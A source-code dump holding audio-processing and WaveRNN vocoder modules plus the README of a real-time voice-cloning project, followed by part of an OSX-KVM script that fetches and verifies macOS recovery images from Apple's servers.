scipy.signal import lfilter import soundfile as sf def label_2_float(x, bits) : return 2 * x / (2**bits - 1.) - 1. def float_2_label(x, bits) : assert abs(x).max() <= 1.0 x = (x + 1.) * (2**bits - 1) / 2 return x.clip(0, 2**bits - 1) def load_wav(path) : return librosa.load(str(path), sr=hp.sample_rate)[0] def save_wav(x, path) : sf.write(path, x.astype(np.float32), hp.sample_rate) def split_signal(x) : unsigned = x + 2**15 coarse = unsigned // 256 fine = unsigned % 256 return coarse, fine def combine_signal(coarse, fine) : return coarse * 256 + fine - 2**15 def encode_16bits(x) : return np.clip(x * 2**15, -2**15, 2**15 - 1).astype(np.int16) mel_basis = None def linear_to_mel(spectrogram): global mel_basis if mel_basis is None: mel_basis = build_mel_basis() return np.dot(mel_basis, spectrogram) def build_mel_basis(): return librosa.filters.mel(hp.sample_rate, hp.n_fft, n_mels=hp.num_mels, fmin=hp.fmin) def normalize(S): return np.clip((S - hp.min_level_db) / -hp.min_level_db, 0, 1) def denormalize(S): return (np.clip(S, 0, 1) * -hp.min_level_db) + hp.min_level_db def amp_to_db(x): return 20 * np.log10(np.maximum(1e-5, x)) def db_to_amp(x): return np.power(10.0, x * 0.05) def spectrogram(y): D = stft(y) S = amp_to_db(np.abs(D)) - hp.ref_level_db return normalize(S) def melspectrogram(y): D = stft(y) S = amp_to_db(linear_to_mel(np.abs(D))) return normalize(S) def stft(y): return librosa.stft(y=y, n_fft=hp.n_fft, hop_length=hp.hop_length, win_length=hp.win_length) def pre_emphasis(x): return lfilter([1, -hp.preemphasis], [1], x) def de_emphasis(x): return lfilter([1], [1, -hp.preemphasis], x) def encode_mu_law(x, mu) : mu = mu - 1 fx = np.sign(x) * np.log(1 + mu * np.abs(x)) / np.log(1 + mu) return np.floor((fx + 1) / 2 * mu + 0.5) def decode_mu_law(y, mu, from_labels=True) : if from_labels: y = label_2_float(y, math.log2(mu)) mu = mu - 1 x = np.sign(y) / mu * ((1 + mu) ** np.abs(y) - 1) return x File: vocoder/gen_wavernn.py from vocoder.models.fatchord_version import WaveRNN from vocoder.audio import * def gen_testset(model: WaveRNN, test_set, samples, batched, target, overlap, save_path): k = model.get_step() // 1000 for i, (m, x) in enumerate(test_set, 1): if i > samples: break print('\n| Generating: %i/%i' % (i, samples)) x = x[0].numpy() bits = 16 if hp.voc_mode == 'MOL' else hp.bits if hp.mu_law and hp.voc_mode != 'MOL' : x = decode_mu_law(x, 2**bits, from_labels=True) else : x = label_2_float(x, bits) save_wav(x, save_path.joinpath("%dk_steps_%d_target.wav" % (k, i))) batch_str = "gen_batched_target%d_overlap%d" % (target, overlap) if batched else \ "gen_not_batched" save_str = save_path.joinpath("%dk_steps_%d_%s.wav" % (k, i, batch_str)) wav = model.generate(m, batched, target, overlap, hp.mu_law) save_wav(wav, save_str) File: vocoder/models/fatchord_version.py import torch import torch.nn as nn import torch.nn.functional as F from vocoder.distribution import sample_from_discretized_mix_logistic from vocoder.display import * from vocoder.audio import * class ResBlock(nn.Module): def __init__(self, dims): super().__init__() self.conv1 = nn.Conv1d(dims, dims, kernel_size=1, bias=False) self.conv2 = nn.Conv1d(dims, dims, kernel_size=1, bias=False) self.batch_norm1 = nn.BatchNorm1d(dims) self.batch_norm2 = nn.BatchNorm1d(dims) def forward(self, x): residual = x x = self.conv1(x) x = self.batch_norm1(x) x = F.relu(x) x = self.conv2(x) x = self.batch_norm2(x) return x + residual class MelResNet(nn.Module): def __init__(self, res_blocks, in_dims, compute_dims, res_out_dims, pad): super().__init__() k_size = pad * 2 + 1 self.conv_in = nn.Conv1d(in_dims, compute_dims, kernel_size=k_size, bias=False) self.batch_norm = nn.BatchNorm1d(compute_dims) self.layers = nn.ModuleList() for i in range(res_blocks): self.layers.append(ResBlock(compute_dims)) self.conv_out = nn.Conv1d(compute_dims, res_out_dims, kernel_size=1) def forward(self, x): x = self.conv_in(x) x = self.batch_norm(x) x = F.relu(x) for f in self.layers: x = f(x) x = self.conv_out(x) return x class Stretch2d(nn.Module): def __init__(self, x_scale, y_scale): super().__init__() self.x_scale = x_scale self.y_scale = y_scale def forward(self, x): b, c, h, w = x.size() x = x.unsqueeze(-1).unsqueeze(3) x = x.repeat(1, 1, 1, self.y_scale, 1, self.x_scale) return x.view(b, c, h * self.y_scale, w * self.x_scale) class UpsampleNetwork(nn.Module): def __init__(self, feat_dims, upsample_scales, compute_dims, res_blocks, res_out_dims, pad): super().__init__() total_scale = np.cumproduct(upsample_scales)[-1] self.indent = pad * total_scale self.resnet = MelResNet(res_blocks, feat_dims, compute_dims, res_out_dims, pad) self.resnet_stretch = Stretch2d(total_scale, 1) self.up_layers = nn.ModuleList() for scale in upsample_scales: k_size = (1, scale * 2 + 1) padding = (0, scale) stretch = Stretch2d(scale, 1) conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=padding, bias=False) conv.weight.data.fill_(1. / k_size[1]) self.up_layers.append(stretch) self.up_layers.append(conv) def forward(self, m): aux = self.resnet(m).unsqueeze(1) aux = self.resnet_stretch(aux) aux = aux.squeeze(1) m = m.unsqueeze(1) for f in self.up_layers: m = f(m) m = m.squeeze(1)[:, :, self.indent:-self.indent] return m.transpose(1, 2), aux.transpose(1, 2) class WaveRNN(nn.Module): def __init__(self, rnn_dims, fc_dims, bits, pad, upsample_factors, feat_dims, compute_dims, res_out_dims, res_blocks, hop_length, sample_rate, mode='RAW'): super().__init__() self.mode = mode self.pad = pad if self.mode == 'RAW' : self.n_classes = 2 ** bits elif self.mode == 'MOL' : self.n_classes = 30 else : RuntimeError("Unknown model mode value - ", self.mode) self.rnn_dims = rnn_dims self.aux_dims = res_out_dims // 4 self.hop_length = hop_length self.sample_rate = sample_rate self.upsample = UpsampleNetwork(feat_dims, upsample_factors, compute_dims, res_blocks, res_out_dims, pad) self.I = nn.Linear(feat_dims + self.aux_dims + 1, rnn_dims) self.rnn1 = nn.GRU(rnn_dims, rnn_dims, batch_first=True) self.rnn2 = nn.GRU(rnn_dims + self.aux_dims, rnn_dims, batch_first=True) self.fc1 = nn.Linear(rnn_dims + self.aux_dims, fc_dims) self.fc2 = nn.Linear(fc_dims + self.aux_dims, fc_dims) self.fc3 = nn.Linear(fc_dims, self.n_classes) self.step = nn.Parameter(torch.zeros(1).long(), requires_grad=False) self.num_params() def forward(self, x, mels): self.step += 1 bsize = x.size(0) if torch.cuda.is_available(): h1 = torch.zeros(1, bsize, self.rnn_dims).cuda() h2 = torch.zeros(1, bsize, self.rnn_dims).cuda() else: h1 = torch.zeros(1, bsize, self.rnn_dims).cpu() h2 = torch.zeros(1, bsize, self.rnn_dims).cpu() mels, aux = self.upsample(mels) aux_idx = [self.aux_dims * i for i in range(5)] a1 = aux[:, :, aux_idx[0]:aux_idx[1]] a2 = aux[:, :, aux_idx[1]:aux_idx[2]] a3 = aux[:, :, aux_idx[2]:aux_idx[3]] a4 = aux[:, :, aux_idx[3]:aux_idx[4]] x = torch.cat([x.unsqueeze(-1), mels, a1], dim=2) x = self.I(x) res = x x, _ = self.rnn1(x, h1) x = x + res res = x x = torch.cat([x, a2], dim=2) x, _ = self.rnn2(x, h2) x = x + res x = torch.cat([x, a3], dim=2) x = F.relu(self.fc1(x)) x = torch.cat([x, a4], dim=2) x = F.relu(self.fc2(x)) return self.fc3(x) def generate(self, mels, batched, target, overlap, mu_law, progress_callback=None): mu_law = mu_law if self.mode == 'RAW' else False progress_callback = progress_callback or self.gen_display self.eval() output = [] start = time.time() rnn1 = self.get_gru_cell(self.rnn1) rnn2 = self.get_gru_cell(self.rnn2) with torch.no_grad(): if torch.cuda.is_available(): mels = mels.cuda() else: mels = mels.cpu() wave_len = (mels.size(-1) - 1) * self.hop_length mels = self.pad_tensor(mels.transpose(1, 2), pad=self.pad, side='both') mels, aux = self.upsample(mels.transpose(1, 2)) if batched: mels = self.fold_with_overlap(mels, target, overlap) aux = self.fold_with_overlap(aux, target, overlap) b_size, seq_len, _ = mels.size() if torch.cuda.is_available(): h1 = torch.zeros(b_size, self.rnn_dims).cuda() h2 = torch.zeros(b_size, self.rnn_dims).cuda() x = torch.zeros(b_size, 1).cuda() else: h1 = torch.zeros(b_size, self.rnn_dims).cpu() h2 = torch.zeros(b_size, self.rnn_dims).cpu() x = torch.zeros(b_size, 1).cpu() d = self.aux_dims aux_split = [aux[:, :, d * i:d * (i + 1)] for i in range(4)] for i in range(seq_len): m_t = mels[:, i, :] a1_t, a2_t, a3_t, a4_t = (a[:, i, :] for a in aux_split) x = torch.cat([x, m_t, a1_t], dim=1) x = self.I(x) h1 = rnn1(x, h1) x = x + h1 inp = torch.cat([x, a2_t], dim=1) h2 = rnn2(inp, h2) x = x + h2 x = torch.cat([x, a3_t], dim=1) x = F.relu(self.fc1(x)) x = torch.cat([x, a4_t], dim=1) x = F.relu(self.fc2(x)) logits = self.fc3(x) if self.mode == 'MOL': sample = sample_from_discretized_mix_logistic(logits.unsqueeze(0).transpose(1, 2)) output.append(sample.view(-1)) if torch.cuda.is_available(): # x = torch.FloatTensor([[sample]]).cuda() x = sample.transpose(0, 1).cuda() else: x = sample.transpose(0, 1) elif self.mode == 'RAW' : posterior = F.softmax(logits, dim=1) distrib = torch.distributions.Categorical(posterior) sample = 2 * distrib.sample().float() / (self.n_classes - 1.) - 1. output.append(sample) x = sample.unsqueeze(-1) else: raise RuntimeError("Unknown model mode value - ", self.mode) if i % 100 == 0: gen_rate = (i + 1) / (time.time() - start) * b_size / 1000 progress_callback(i, seq_len, b_size, gen_rate) output = torch.stack(output).transpose(0, 1) output = output.cpu().numpy() output = output.astype(np.float64) if batched: output = self.xfade_and_unfold(output, target, overlap) else: output = output[0] if mu_law: output = decode_mu_law(output, self.n_classes, False) if hp.apply_preemphasis: output = de_emphasis(output) # Fade-out at the end to avoid signal cutting out suddenly fade_out = np.linspace(1, 0, 20 * self.hop_length) output = output[:wave_len] output[-20 * self.hop_length:] *= fade_out self.train() return output def gen_display(self, i, seq_len, b_size, gen_rate): pbar = progbar(i, seq_len) msg = f'| {pbar} {i*b_size}/{seq_len*b_size} | Batch Size: {b_size} | Gen Rate: {gen_rate:.1f}kHz | ' stream(msg) def get_gru_cell(self, gru): gru_cell = nn.GRUCell(gru.input_size, gru.hidden_size) gru_cell.weight_hh.data = gru.weight_hh_l0.data gru_cell.weight_ih.data = gru.weight_ih_l0.data gru_cell.bias_hh.data = gru.bias_hh_l0.data gru_cell.bias_ih.data = gru.bias_ih_l0.data return gru_cell def pad_tensor(self, x, pad, side='both'): # NB - this is just a quick method i need right now # i.e., it won't generalise to other shapes/dims b, t, c = x.size() total = t + 2 * pad if side == 'both' else t + pad if torch.cuda.is_available(): padded = torch.zeros(b, total, c).cuda() else: padded = torch.zeros(b, total, c).cpu() if side == 'before' or side == 'both': padded[:, pad:pad + t, :] = x elif side == 'after': padded[:, :t, :] = x return padded def fold_with_overlap(self, x, target, overlap): ''' Fold the tensor with overlap for quick batched inference. Overlap will be used for crossfading in xfade_and_unfold() Args: x (tensor) : Upsampled conditioning features. shape=(1, timesteps, features) target (int) : Target timesteps for each index of batch overlap (int) : Timesteps for both xfade and rnn warmup Return: (tensor) : shape=(num_folds, target + 2 * overlap, features) Details: x = [[h1, h2, ... hn]] Where each h is a vector of conditioning features Eg: target=2, overlap=1 with x.size(1)=10 folded = [[h1, h2, h3, h4], [h4, h5, h6, h7], [h7, h8, h9, h10]] ''' _, total_len, features = x.size() # Calculate variables needed num_folds = (total_len - overlap) // (target + overlap) extended_len = num_folds * (overlap + target) + overlap remaining = total_len - extended_len # Pad if some time steps poking out if remaining != 0: num_folds += 1 padding = target + 2 * overlap - remaining x = self.pad_tensor(x, padding, side='after') if torch.cuda.is_available(): folded = torch.zeros(num_folds, target + 2 * overlap, features).cuda() else: folded = torch.zeros(num_folds, target + 2 * overlap, features).cpu() # Get the values for the folded tensor for i in range(num_folds): start = i * (target + overlap) end = start + target + 2 * overlap folded[i] = x[:, start:end, :] return folded def xfade_and_unfold(self, y, target, overlap): ''' Applies a crossfade and unfolds into a 1d array. Args: y (ndarry) : Batched sequences of audio samples shape=(num_folds, target + 2 * overlap) dtype=np.float64 overlap (int) : Timesteps for both xfade and rnn warmup Return: (ndarry) : audio samples in a 1d array shape=(total_len) dtype=np.float64 Details: y = [[seq1], [seq2], [seq3]] Apply a gain envelope at both ends of the sequences y = [[seq1_in, seq1_target, seq1_out], [seq2_in, seq2_target, seq2_out], [seq3_in, seq3_target, seq3_out]] Stagger and add up the groups of samples: [seq1_in, seq1_target, (seq1_out + seq2_in), seq2_target, ...] ''' num_folds, length = y.shape target = length - 2 * overlap total_len = num_folds * (target + overlap) + overlap # Need some silence for the rnn warmup silence_len = overlap // 2 fade_len = overlap - silence_len silence = np.zeros((silence_len), dtype=np.float64) # Equal power crossfade t = np.linspace(-1, 1, fade_len, dtype=np.float64) fade_in = np.sqrt(0.5 * (1 + t)) fade_out = np.sqrt(0.5 * (1 - t)) # Concat the silence to the fades fade_in = np.concatenate([silence, fade_in]) fade_out = np.concatenate([fade_out, silence]) # Apply the gain to the overlap samples y[:, :overlap] *= fade_in y[:, -overlap:] *= fade_out unfolded = np.zeros((total_len), dtype=np.float64) # Loop to add up all the samples for i in range(num_folds): start = i * (target + overlap) end = start + target + 2 * overlap unfolded[start:end] += y[i] return unfolded def get_step(self) : return self.step.data.item() def checkpoint(self, model_dir, optimizer) : k_steps = self.get_step() // 1000 self.save(model_dir.joinpath("checkpoint_%dk_steps.pt" % k_steps), optimizer) def log(self, path, msg) : with open(path, 'a') as f: print(msg, file=f) def load(self, path, optimizer) : checkpoint = torch.load(path) if "optimizer_state" in checkpoint: self.load_state_dict(checkpoint["model_state"]) optimizer.load_state_dict(checkpoint["optimizer_state"]) else: # Backwards compatibility self.load_state_dict(checkpoint) def save(self, path, optimizer) : torch.save({ "model_state": self.state_dict(), "optimizer_state": optimizer.state_dict(), }, path) def num_params(self, print_out=True): parameters = filter(lambda p: p.requires_grad, self.parameters()) parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 if print_out : print('Trainable Parameters: %.3fM' % parameters) File: vocoder/models/deepmind_version.py import torch import torch.nn as nn import torch.nn.functional as F from utils.display import * from utils.dsp import * class WaveRNN(nn.Module) : def __init__(self, hidden_size=896, quantisation=256) : super(WaveRNN, self).__init__() self.hidden_size = hidden_size self.split_size = hidden_size // 2 # The main matmul self.R = nn.Linear(self.hidden_size, 3 * self.hidden_size, bias=False) # Output fc layers self.O1 = nn.Linear(self.split_size, self.split_size) self.O2 = nn.Linear(self.split_size, quantisation) self.O3 = nn.Linear(self.split_size, self.split_size) self.O4 = nn.Linear(self.split_size, quantisation) # Input fc layers self.I_coarse = nn.Linear(2, 3 * self.split_size, bias=False) self.I_fine = nn.Linear(3, 3 * self.split_size, bias=False) # biases for the gates self.bias_u = nn.Parameter(torch.zeros(self.hidden_size)) self.bias_r = nn.Parameter(torch.zeros(self.hidden_size)) self.bias_e = nn.Parameter(torch.zeros(self.hidden_size)) # display num params self.num_params() def forward(self, prev_y, prev_hidden, current_coarse) : # Main matmul - the projection is split 3 ways R_hidden = self.R(prev_hidden) R_u, R_r, R_e, = torch.split(R_hidden, self.hidden_size, dim=1) # Project the prev input coarse_input_proj = self.I_coarse(prev_y) I_coarse_u, I_coarse_r, I_coarse_e = \ torch.split(coarse_input_proj, self.split_size, dim=1) # Project the prev input and current coarse sample fine_input = torch.cat([prev_y, current_coarse], dim=1) fine_input_proj = self.I_fine(fine_input) I_fine_u, I_fine_r, I_fine_e = \ torch.split(fine_input_proj, self.split_size, dim=1) # concatenate for the gates I_u = torch.cat([I_coarse_u, I_fine_u], dim=1) I_r = torch.cat([I_coarse_r, I_fine_r], dim=1) I_e = torch.cat([I_coarse_e, I_fine_e], dim=1) # Compute all gates for coarse and fine u = F.sigmoid(R_u + I_u + self.bias_u) r = F.sigmoid(R_r + I_r + self.bias_r) e = F.tanh(r * R_e + I_e + self.bias_e) hidden = u * prev_hidden + (1. - u) * e # Split the hidden state hidden_coarse, hidden_fine = torch.split(hidden, self.split_size, dim=1) # Compute outputs out_coarse = self.O2(F.relu(self.O1(hidden_coarse))) out_fine = self.O4(F.relu(self.O3(hidden_fine))) return out_coarse, out_fine, hidden def generate(self, seq_len): with torch.no_grad(): # First split up the biases for the gates b_coarse_u, b_fine_u = torch.split(self.bias_u, self.split_size) b_coarse_r, b_fine_r = torch.split(self.bias_r, self.split_size) b_coarse_e, b_fine_e = torch.split(self.bias_e, self.split_size) # Lists for the two output seqs c_outputs, f_outputs = [], [] # Some initial inputs out_coarse = torch.LongTensor([0]).cuda() out_fine = torch.LongTensor([0]).cuda() # We'll meed a hidden state hidden = self.init_hidden() # Need a clock for display start = time.time() # Loop for generation for i in range(seq_len) : # Split into two hidden states hidden_coarse, hidden_fine = \ torch.split(hidden, self.split_size, dim=1) # Scale and concat previous predictions out_coarse = out_coarse.unsqueeze(0).float() / 127.5 - 1. out_fine = out_fine.unsqueeze(0).float() / 127.5 - 1. prev_outputs = torch.cat([out_coarse, out_fine], dim=1) # Project input coarse_input_proj = self.I_coarse(prev_outputs) I_coarse_u, I_coarse_r, I_coarse_e = \ torch.split(coarse_input_proj, self.split_size, dim=1) # Project hidden state and split 6 ways R_hidden = self.R(hidden) R_coarse_u , R_fine_u, \ R_coarse_r, R_fine_r, \ R_coarse_e, R_fine_e = torch.split(R_hidden, self.split_size, dim=1) # Compute the coarse gates u = F.sigmoid(R_coarse_u + I_coarse_u + b_coarse_u) r = F.sigmoid(R_coarse_r + I_coarse_r + b_coarse_r) e = F.tanh(r * R_coarse_e + I_coarse_e + b_coarse_e) hidden_coarse = u * hidden_coarse + (1. - u) * e # Compute the coarse output out_coarse = self.O2(F.relu(self.O1(hidden_coarse))) posterior = F.softmax(out_coarse, dim=1) distrib = torch.distributions.Categorical(posterior) out_coarse = distrib.sample() c_outputs.append(out_coarse) # Project the [prev outputs and predicted coarse sample] coarse_pred = out_coarse.float() / 127.5 - 1. fine_input = torch.cat([prev_outputs, coarse_pred.unsqueeze(0)], dim=1) fine_input_proj = self.I_fine(fine_input) I_fine_u, I_fine_r, I_fine_e = \ torch.split(fine_input_proj, self.split_size, dim=1) # Compute the fine gates u = F.sigmoid(R_fine_u + I_fine_u + b_fine_u) r = F.sigmoid(R_fine_r + I_fine_r + b_fine_r) e = F.tanh(r * R_fine_e + I_fine_e + b_fine_e) hidden_fine = u * hidden_fine + (1. - u) * e # Compute the fine output out_fine = self.O4(F.relu(self.O3(hidden_fine))) posterior = F.softmax(out_fine, dim=1) distrib = torch.distributions.Categorical(posterior) out_fine = distrib.sample() f_outputs.append(out_fine) # Put the hidden state back together hidden = torch.cat([hidden_coarse, hidden_fine], dim=1) # Display progress speed = (i + 1) / (time.time() - start) stream('Gen: %i/%i -- Speed: %i', (i + 1, seq_len, speed)) coarse = torch.stack(c_outputs).squeeze(1).cpu().data.numpy() fine = torch.stack(f_outputs).squeeze(1).cpu().data.numpy() output = combine_signal(coarse, fine) return output, coarse, fine def init_hidden(self, batch_size=1) : return torch.zeros(batch_size, self.hidden_size).cuda() def num_params(self) : parameters = filter(lambda p: p.requires_grad, self.parameters()) parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 print('Trainable Parameters: %.3f million' % parameters)
# Real-Time Voice Cloning This repository is an implementation of [Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis](https://arxiv.org/pdf/1806.04558.pdf) (SV2TTS) with a vocoder that works in real-time. This was my [master's thesis](https://matheo.uliege.be/handle/2268.2/6801). SV2TTS is a deep learning framework in three stages. In the first stage, one creates a digital representation of a voice from a few seconds of audio. In the second and third stages, this representation is used as reference to generate speech given arbitrary text. **Video demonstration** (click the picture): [![Toolbox demo](https://i.imgur.com/8lFUlgz.png)](https://www.youtube.com/watch?v=-O_hYhToKoA) ### Papers implemented | URL | Designation | Title | Implementation source | | --- | ----------- | ----- | --------------------- | |[**1806.04558**](https://arxiv.org/pdf/1806.04558.pdf) | **SV2TTS** | **Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis** | This repo | |[1802.08435](https://arxiv.org/pdf/1802.08435.pdf) | WaveRNN (vocoder) | Efficient Neural Audio Synthesis | [fatchord/WaveRNN](https://github.com/fatchord/WaveRNN) | |[1703.10135](https://arxiv.org/pdf/1703.10135.pdf) | Tacotron (synthesizer) | Tacotron: Towards End-to-End Speech Synthesis | [fatchord/WaveRNN](https://github.com/fatchord/WaveRNN) |[1710.10467](https://arxiv.org/pdf/1710.10467.pdf) | GE2E (encoder)| Generalized End-To-End Loss for Speaker Verification | This repo | ## Heads up Like everything else in Deep Learning, this repo has quickly gotten old. Many SaaS apps (often paying) will give you a better audio quality than this repository will. If you wish for an open-source solution with a high voice quality: - Check out [paperswithcode](https://paperswithcode.com/task/speech-synthesis/) for other repositories and recent research in the field of speech synthesis. - Check out [CoquiTTS](https://github.com/coqui-ai/tts) for a repository with a better voice cloning quality and more functionalities. - Check out [MetaVoice-1B](https://github.com/metavoiceio/metavoice-src) for a large voice model with high voice quality ## Setup ### 1. Install Requirements 1. Both Windows and Linux are supported. A GPU is recommended for training and for inference speed, but is not mandatory. 2. Python 3.7 is recommended. Python 3.5 or greater should work, but you'll probably have to tweak the dependencies' versions. I recommend setting up a virtual environment using `venv`, but this is optional. 3. Install [ffmpeg](https://ffmpeg.org/download.html#get-packages). This is necessary for reading audio files. 4. Install [PyTorch](https://pytorch.org/get-started/locally/). Pick the latest stable version, your operating system, your package manager (pip by default) and finally pick any of the proposed CUDA versions if you have a GPU, otherwise pick CPU. Run the given command. 5. Install the remaining requirements with `pip install -r requirements.txt` ### 2. (Optional) Download Pretrained Models Pretrained models are now downloaded automatically. If this doesn't work for you, you can manually download them [here](https://github.com/CorentinJ/Real-Time-Voice-Cloning/wiki/Pretrained-models). ### 3. (Optional) Test Configuration Before you download any dataset, you can begin by testing your configuration with: `python demo_cli.py` If all tests pass, you're good to go. ### 4. (Optional) Download Datasets For playing with the toolbox alone, I only recommend downloading [`LibriSpeech/train-clean-100`](https://www.openslr.org/resources/12/train-clean-100.tar.gz). Extract the contents as `<datasets_root>/LibriSpeech/train-clean-100` where `<datasets_root>` is a directory of your choosing. Other datasets are supported in the toolbox, see [here](https://github.com/CorentinJ/Real-Time-Voice-Cloning/wiki/Training#datasets). You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox. ### 5. Launch the Toolbox You can then try the toolbox: `python demo_toolbox.py -d <datasets_root>` or `python demo_toolbox.py` depending on whether you downloaded any datasets. If you are running an X-server or if you have the error `Aborted (core dumped)`, see [this issue](https://github.com/CorentinJ/Real-Time-Voice-Cloning/issues/11#issuecomment-504733590).
OSX-KVM
182e2dd0715175801521f6342ac7cc715044cb12
File: fetch-macOS-v2.py #!/usr/bin/env python3 # pylint: disable=C0301,C0116,C0103,R0903 """ Gather recovery information for Macs. Copyright (c) 2019, vit9696 macrecovery is a tool that helps to automate recovery interaction. It can be used to download diagnostics and recovery as well as analyse MLB. Requires python to run. Run with `-h` argument to see all available arguments. Upstream: https://github.com/acidanthera/OpenCorePkg/tree/master/Utilities/macrecovery pylint -> Your code has been rated at -0.08/10 ;( """ import argparse import binascii import hashlib import json import linecache import os import random import struct import sys try: from urllib.request import Request, HTTPError, urlopen from urllib.parse import urlparse except ImportError: from urllib2 import Request, HTTPError, urlopen from urlparse import urlparse SELF_DIR = os.path.dirname(os.path.realpath(__file__)) RECENT_MAC = 'Mac-7BA5B2D9E42DDD94' MLB_ZERO = '00000000000000000' MLB_VALID = 'C02749200YGJ803AX' MLB_PRODUCT = '00000000000J80300' TYPE_SID = 16 TYPE_K = 64 TYPE_FG = 64 INFO_PRODUCT = 'AP' INFO_IMAGE_LINK = 'AU' INFO_IMAGE_HASH = 'AH' INFO_IMAGE_SESS = 'AT' INFO_SIGN_LINK = 'CU' INFO_SIGN_HASH = 'CH' INFO_SIGN_SESS = 'CT' INFO_REQURED = [INFO_PRODUCT, INFO_IMAGE_LINK, INFO_IMAGE_HASH, INFO_IMAGE_SESS, INFO_SIGN_LINK, INFO_SIGN_HASH, INFO_SIGN_SESS] def run_query(url, headers, post=None, raw=False): if post is not None: data = '\n'.join([entry + '=' + post[entry] for entry in post]) if sys.version_info[0] >= 3: data = data.encode('utf-8') else: data = None req = Request(url=url, headers=headers, data=data) try: response = urlopen(req) if raw: return response return dict(response.info()), response.read() except HTTPError as e: print(f'ERROR: "{e}" when connecting to {url}') sys.exit(1) def generate_id(id_type, id_value=None): valid_chars = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'] return ''.join(random.choice(valid_chars) for i in range(id_type)) if not id_value else id_value def product_mlb(mlb): return '00000000000' + mlb[11] + mlb[12] + mlb[13] + mlb[14] + '00' def mlb_from_eeee(eeee): if len(eeee) != 4: print('ERROR: Invalid EEEE code length!') sys.exit(1) return f'00000000000{eeee}00' def int_from_unsigned_bytes(byte_list, byteorder): if byteorder == 'little': byte_list = byte_list[::-1] encoded = binascii.hexlify(byte_list) return int(encoded, 16) # zhangyoufu https://gist.github.com/MCJack123/943eaca762730ca4b7ae460b731b68e7#gistcomment-3061078 2021-10-08 Apple_EFI_ROM_public_key_1 = 0xC3E748CAD9CD384329E10E25A91E43E1A762FF529ADE578C935BDDF9B13F2179D4855E6FC89E9E29CA12517D17DFA1EDCE0BEBF0EA7B461FFE61D94E2BDF72C196F89ACD3536B644064014DAE25A15DB6BB0852ECBD120916318D1CCDEA3C84C92ED743FC176D0BACA920D3FCF3158AFF731F88CE0623182A8ED67E650515F75745909F07D415F55FC15A35654D118C55A462D37A3ACDA08612F3F3F6571761EFCCBCC299AEE99B3A4FD6212CCFFF5EF37A2C334E871191F7E1C31960E010A54E86FA3F62E6D6905E1CD57732410A3EB0C6B4DEFDABE9F59BF1618758C751CD56CEF851D1C0EAA1C558E37AC108DA9089863D20E2E7E4BF475EC66FE6B3EFDCF ChunkListHeader = struct.Struct('<4sIBBBxQQQ') assert ChunkListHeader.size == 0x24 Chunk = struct.Struct('<I32s') assert Chunk.size == 0x24 def verify_chunklist(cnkpath): with open(cnkpath, 'rb') as f: hash_ctx = hashlib.sha256() data = f.read(ChunkListHeader.size) hash_ctx.update(data) magic, header_size, file_version, chunk_method, signature_method, chunk_count, chunk_offset, signature_offset = ChunkListHeader.unpack(data) assert magic == b'CNKL' assert header_size == ChunkListHeader.size assert file_version == 1 assert chunk_method == 1 assert signature_method in [1, 2] assert chunk_count > 0 assert chunk_offset == 0x24 assert signature_offset == chunk_offset + Chunk.size * chunk_count for _ in range(chunk_count): data = f.read(Chunk.size) hash_ctx.update(data) chunk_size, chunk_sha256 = Chunk.unpack(data) yield chunk_size, chunk_sha256 digest = hash_ctx.digest() if signature_method == 1: data = f.read(256) assert len(data) == 256 signature = int_from_unsigned_bytes(data, 'little') plaintext = 0x1ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d0609608648016503040201050004200000000000000000000000000000000000000000000000000000000000000000 | int_from_unsigned_bytes(digest, 'big') assert pow(signature, 0x10001, Apple_EFI_ROM_public_key_1) == plaintext elif signature_method == 2: data = f.read(32) assert data == digest raise RuntimeError('Chunklist missing digital signature') else: raise NotImplementedError assert f.read(1) == b'' def get_session(args): headers = { 'Host': 'osrecovery.apple.com', 'Connection': 'close', 'User-Agent': 'InternetRecovery/1.0', } headers, _ = run_query('http://osrecovery.apple.com/', headers) if args.verbose: print('Session headers:') for header in headers: print(f'{header}: {headers[header]}') for header in headers: if header.lower() == 'set-cookie': cookies = headers[header].split('; ') for cookie in cookies: return cookie if cookie.startswith('session=') else ... raise RuntimeError('No session in headers ' + str(headers)) def get_image_info(session, bid, mlb=MLB_ZERO, diag=False, os_type='default', cid=None): headers = { 'Host': 'osrecovery.apple.com', 'Connection': 'close', 'User-Agent': 'InternetRecovery/1.0', 'Cookie': session, 'Content-Type': 'text/plain', } post = { 'cid': generate_id(TYPE_SID, cid), 'sn': mlb, 'bid': bid, 'k': generate_id(TYPE_K), 'fg': generate_id(TYPE_FG) } if diag: url = 'http://osrecovery.apple.com/InstallationPayload/Diagnostics' else: url = 'http://osrecovery.apple.com/InstallationPayload/RecoveryImage' post['os'] = os_type headers, output = run_query(url, headers, post) output = output.decode('utf-8') info = {} for line in output.split('\n'): try: key, value = line.split(': ') info[key] = value except Exception: continue for k in INFO_REQURED: if k not in info: raise RuntimeError(f'Missing key {k}') return info def save_image(url, sess, filename='', directory=''): purl = urlparse(url) headers = { 'Host': purl.hostname, 'Connection': 'close', 'User-Agent': 'InternetRecovery/1.0', 'Cookie': '='.join(['AssetToken', sess]) } if not os.path.exists(directory): os.mkdir(directory) if filename == '': filename = os.path.basename(purl.path) if filename.find('/') >= 0 or filename == '': raise RuntimeError('Invalid save path ' + filename) print(f'Saving {url} to {directory}/{filename}...') with open(os.path.join(directory, filename), 'wb') as fh: response = run_query(url, headers, raw=True) total_size = int(response.headers['content-length']) / float(2 ** 20) # print(total_size) if total_size < 1: total_size = response.headers['content-length'] print("Note: The total download size is %s bytes" % total_size) else: print("Note: The total download size is %0.2f MB" % total_size) size = 0 while True: chunk = response.read(2**20) if not chunk: break fh.write(chunk) size += len(chunk) print(f'\r{size / (2**20)} MBs downloaded...', end='') sys.stdout.flush() print('\rDownload complete!\t\t\t\t\t') return os.path.join(directory, os.path.basename(filename)) def 